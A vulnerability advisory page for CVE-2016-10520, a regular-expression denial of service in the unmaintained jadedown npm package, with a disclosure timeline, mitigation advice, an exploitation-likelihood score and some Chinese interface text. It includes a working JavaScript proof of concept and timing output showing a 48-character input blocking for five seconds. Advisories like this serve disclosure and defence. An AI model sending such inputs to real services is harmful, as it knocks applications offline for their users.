CVE-2016-10520
Regular Expression Denial of Service in jadedown
描述
The `jadedown` package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in. ### Proof of concept ```js var jadedown = require('jadedown'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } for (i=1;i<=10000000;i=i+1) { console.log("COUNT: " + i); var str = genstr(i, 'f') + genstr(i, '#') + '{'; console.log("LENGTH: " + str.length); var start = process.hrtime(); jadedown(str) var end = process.hrtime(start); console.log(end); } ``` Results demonstrating blocking for 5 seconds using only 48 characters. ``` $ node jadedown.js COUNT: 1 LENGTH: 6 [ 0, 4014065 ] COUNT: 4 LENGTH: 12 [ 0, 503507 ] COUNT: 7 LENGTH: 18 [ 0, 325225 ] COUNT: 10 LENGTH: 24 [ 0, 1632684 ] COUNT: 13 LENGTH: 30 [ 0, 7541230 ] COUNT: 16 LENGTH: 36 [ 0, 80889495 ] COUNT: 19 LENGTH: 42 [ 0, 636009936 ] COUNT: 22 LENGTH: 48 [ 5, 820586760 ] ``` # Timeline - October 24, 2015 - Vulnerability Identified - October 24, 2015 - Maintainers Notified - October 25, 2015 - Response from Maintainers with intent to fix - January 5, 2016 - Advisory Published - January 11, 2016 - CVE Requested ## Recommendation This package is not actively maintained, and has not seen an update since 2011. The package also provides unique functionality in the form of a templating language that is not available elsewhere. If this package is used to process user input, the best available mitigation is to refactor the dependent application to not make use of this module.
如何修補 CVE-2016-10520
目前尚未發布修補版本。可考慮移除受影響套件,或參考下方連結中的上游建議。
- —未列出修補版本
CVE-2016-10520 正在被利用嗎?
低 — EPSS 為 0.3%,目前沒有觀察到大規模利用活動。
受影響套件(1)
- from 0, <= 0.0.3